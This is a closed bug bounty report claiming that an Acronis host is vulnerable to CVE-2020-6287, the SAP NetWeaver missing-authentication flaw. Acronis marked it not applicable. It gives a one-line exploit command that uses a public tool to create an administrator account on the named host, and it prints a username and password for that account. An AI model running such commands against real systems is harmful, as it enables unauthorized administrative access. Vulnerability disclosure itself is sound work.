CVE-2020-6287 https://redapi2.acronis.com

Severity

Critical

Program

Acronis

Team Summary

Official summary from Acronis

The report is not applicable since redapi.acronis.com and redapi2.acronis.com are internally developed systems not related to SAP NetWeaver.

Reported by savik

Vulnerability Details

Technical details and impact analysis

Improper Access Control - Generic
Hi team.

## Summary

CVE-2020-6287 https://redapi2.acronis.com

https://nvd.nist.gov/vuln/detail/CVE-2020-6287

> SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check.

You can check. I created a user with the role 'Administrator':

```
sapRpoc9846:Secure!PwD7849
```

## Steps To Reproduce

1. Clone https://github.com/chipik/SAP_RECON
2. `python3 RECON.py -a -H redapi2.acronis.com -P 443 -s`

Thanks.

## Impact

Administrative user on the SAP system.

Related CVEs

Associated Common Vulnerabilities and Exposures

SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising …

Report Details

Additional information and metadata

State

Closed

Substate

Not-Applicable

Weakness

Improper Access Control - Generic